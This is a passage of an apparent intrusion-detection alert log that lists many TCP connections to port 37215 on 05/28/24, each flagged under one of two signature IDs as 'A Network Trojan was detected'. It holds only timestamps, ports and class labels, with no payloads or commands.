            Timestamp:05/28/24-09:56:58.778222
            SID:2835222
            Source Port:54090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.387428
            SID:2835222
            Source Port:52538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849663
            SID:2835222
            Source Port:34438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054296
            SID:2835222
            Source Port:37182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.900626
            SID:2835222
            Source Port:32864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935945
            SID:2829579
            Source Port:38516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.299915
            SID:2829579
            Source Port:41318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861644
            SID:2829579
            Source Port:33412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808399
            SID:2829579
            Source Port:57708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.561068
            SID:2835222
            Source Port:48846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473355
            SID:2835222
            Source Port:59122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.695999
            SID:2835222
            Source Port:51422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.035110
            SID:2835222
            Source Port:42688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371441
            SID:2835222
            Source Port:55544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739094
            SID:2835222
            Source Port:50572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.147609
            SID:2829579
            Source Port:58436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.506754
            SID:2829579
            Source Port:45832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954601
            SID:2829579
            Source Port:49902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505857
            SID:2835222
            Source Port:49024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779156
            SID:2835222
            Source Port:44588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855028
            SID:2829579
            Source Port:40438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809600
            SID:2829579
            Source Port:54088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.833725
            SID:2829579
            Source Port:39444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056892
            SID:2835222
            Source Port:45158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873045
            SID:2829579
            Source Port:48152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563373
            SID:2835222
            Source Port:40290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.843782
            SID:2835222
            Source Port:43990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.990552
            SID:2829579
            Source Port:37916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291563
            SID:2829579
            Source Port:47262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.383588
            SID:2835222
            Source Port:40042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.470064
            SID:2829579
            Source Port:47510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875050
            SID:2835222
            Source Port:45610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777574
            SID:2829579
            Source Port:44988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.668247
            SID:2835222
            Source Port:60344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581684
            SID:2829579
            Source Port:38584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.601856
            SID:2835222
            Source Port:43080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772304
            SID:2829579
            Source Port:43826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850302
            SID:2835222
            Source Port:34796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779095
            SID:2835222
            Source Port:50708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777540
            SID:2829579
            Source Port:37800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066732
            SID:2835222
            Source Port:47902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.645072
            SID:2829579
            Source Port:33218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.830619
            SID:2829579
            Source Port:49386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776476
            SID:2829579
            Source Port:60184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.443262
            SID:2829579
            Source Port:46052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.737601
            SID:2829579
            Source Port:60930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.043142
            SID:2829579
            Source Port:49466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766671
            SID:2829579
            Source Port:57756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.453140
            SID:2829579
            Source Port:55634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903452
            SID:2835222
            Source Port:54918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320119
            SID:2829579
            Source Port:39956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.295865
            SID:2835222
            Source Port:44702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847783
            SID:2829579
            Source Port:38252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.149899
            SID:2835222
            Source Port:56560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.908394
            SID:2835222
            Source Port:59446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.660769
            SID:2835222
            Source Port:42786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862869
            SID:2829579
            Source Port:55146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326733
            SID:2829579
            Source Port:60186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.834094
            SID:2829579
            Source Port:57616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912145
            SID:2829579
            Source Port:57442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605176
            SID:2835222
            Source Port:39438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436907
            SID:2829579
            Source Port:45834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771702
            SID:2829579
            Source Port:35354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.716660
            SID:2829579
            Source Port:52066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005223
            SID:2829579
            Source Port:45348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765298
            SID:2835222
            Source Port:49508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.910902
            SID:2835222
            Source Port:55332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850577
            SID:2829579
            Source Port:45746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061252
            SID:2835222
            Source Port:42942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.288978
            SID:2835222
            Source Port:47758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505524
            SID:2829579
            Source Port:33144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943299
            SID:2835222
            Source Port:47224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669886
            SID:2829579
            Source Port:42838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873399
            SID:2835222
            Source Port:59288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.327692
            SID:2835222
            Source Port:33184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777773
            SID:2835222
            Source Port:59352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047619
            SID:2829579
            Source Port:50546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280363
            SID:2829579
            Source Port:36900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911344
            SID:2829579
            Source Port:38180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.332153
            SID:2829579
            Source Port:48792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887489
            SID:2829579
            Source Port:45400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.419581
            SID:2835222
            Source Port:56386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.464519
            SID:2829579
            Source Port:53604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.092039
            SID:2829579
            Source Port:49824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782422
            SID:2835222
            Source Port:52702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766021
            SID:2829579
            Source Port:33600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.543213
            SID:2835222
            Source Port:40328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004082
            SID:2835222
            Source Port:41262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066670
            SID:2835222
            Source Port:43430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.552572
            SID:2829579
            Source Port:41652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957171
            SID:2829579
            Source Port:41004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.586705
            SID:2835222
            Source Port:50410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.923557
            SID:2829579
            Source Port:48210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.322622
            SID:2829579
            Source Port:49900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033367
            SID:2835222
            Source Port:45704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756509
            SID:2835222
            Source Port:47454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777490
            SID:2835222
            Source Port:37506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810567
            SID:2835222
            Source Port:60466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.897836
            SID:2829579
            Source Port:48982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.419293
            SID:2835222
            Source Port:47972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772395
            SID:2835222
            Source Port:57484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986880
            SID:2829579
            Source Port:39444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887495
            SID:2829579
            Source Port:36522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.703136
            SID:2829579
            Source Port:35266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.597382
            SID:2835222
            Source Port:40500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870200
            SID:2835222
            Source Port:47948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.933325
            SID:2835222
            Source Port:55736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069052
            SID:2835222
            Source Port:57170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734397
            SID:2835222
            Source Port:47942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505802
            SID:2829579
            Source Port:48120
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.897399
            SID:2835222
            Source Port:58800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773909
            SID:2829579
            Source Port:45442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669448
            SID:2829579
            Source Port:34012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.681803
            SID:2835222
            Source Port:45354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919768
            SID:2829579
            Source Port:55674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943817
            SID:2829579
            Source Port:52058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.725419
            SID:2829579
            Source Port:42652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990329
            SID:2829579
            Source Port:53470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321457
            SID:2829579
            Source Port:59440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843153
            SID:2829579
            Source Port:46488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935462
            SID:2835222
            Source Port:36364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.592238
            SID:2835222
            Source Port:52866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.396711
            SID:2835222
            Source Port:51066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.035601
            SID:2835222
            Source Port:51412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778172
            SID:2829579
            Source Port:37162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841934
            SID:2835222
            Source Port:56320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988237
            SID:2835222
            Source Port:45902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840904
            SID:2835222
            Source Port:36236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776380
            SID:2835222
            Source Port:46750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277037
            SID:2829579
            Source Port:57710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848250
            SID:2835222
            Source Port:44252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.341924
            SID:2835222
            Source Port:51910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432841
            SID:2829579
            Source Port:44430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.560206
            SID:2829579
            Source Port:54942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.487714
            SID:2835222
            Source Port:57524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.316787
            SID:2835222
            Source Port:54428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759703
            SID:2829579
            Source Port:54332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777862
            SID:2829579
            Source Port:45178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929847
            SID:2835222
            Source Port:37516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939206
            SID:2835222
            Source Port:43248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.190676
            SID:2829579
            Source Port:48982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.926722
            SID:2829579
            Source Port:50606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308252
            SID:2829579
            Source Port:42696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777536
            SID:2835222
            Source Port:51182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459615
            SID:2835222
            Source Port:57258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.835944
            SID:2829579
            Source Port:48792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.802136
            SID:2829579
            Source Port:45252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.026347
            SID:2835222
            Source Port:33124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.185149
            SID:2835222
            Source Port:34342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.382068
            SID:2829579
            Source Port:41638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.386716
            SID:2829579
            Source Port:36114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.902404
            SID:2835222
            Source Port:44350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988307
            SID:2835222
            Source Port:36488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969214
            SID:2829579
            Source Port:49562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956219
            SID:2829579
            Source Port:36876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.788860
            SID:2829579
            Source Port:57462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.759668
            SID:2829579
            Source Port:59960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825137
            SID:2829579
            Source Port:59378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894336
            SID:2835222
            Source Port:49174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860440
            SID:2829579
            Source Port:34444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.953825
            SID:2829579
            Source Port:54100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728492
            SID:2835222
            Source Port:51272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.661653
            SID:2835222
            Source Port:51746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.897864
            SID:2829579
            Source Port:49522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065456
            SID:2829579
            Source Port:40850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.846612
            SID:2835222
            Source Port:58272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260526
            SID:2835222
            Source Port:34522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810350
            SID:2829579
            Source Port:49122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967875
            SID:2835222
            Source Port:49872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.500091
            SID:2829579
            Source Port:49262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.685992
            SID:2835222
            Source Port:44178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.587440
            SID:2835222
            Source Port:56080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848239
            SID:2835222
            Source Port:36986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052840
            SID:2829579
            Source Port:42910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.078878
            SID:2835222
            Source Port:36554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873607
            SID:2829579
            Source Port:34972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.722092
            SID:2835222
            Source Port:33802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776973
            SID:2835222
            Source Port:39950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.616263
            SID:2829579
            Source Port:32906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.473949
            SID:2835222
            Source Port:57648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.425858
            SID:2835222
            Source Port:55844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507323
            SID:2835222
            Source Port:45200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931516
            SID:2829579
            Source Port:59802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516575
            SID:2835222
            Source Port:56114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.675592
            SID:2829579
            Source Port:46066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.659770
            SID:2829579
            Source Port:40898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930266
            SID:2829579
            Source Port:53590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.573108
            SID:2835222
            Source Port:56412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743951
            SID:2829579
            Source Port:41652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532626
            SID:2829579
            Source Port:45788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857836
            SID:2835222
            Source Port:46436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837519
            SID:2829579
            Source Port:56556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026453
            SID:2829579
            Source Port:51400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563291
            SID:2829579
            Source Port:33080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.014471
            SID:2829579
            Source Port:35136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.349931
            SID:2829579
            Source Port:38000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922340
            SID:2835222
            Source Port:59880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.631658
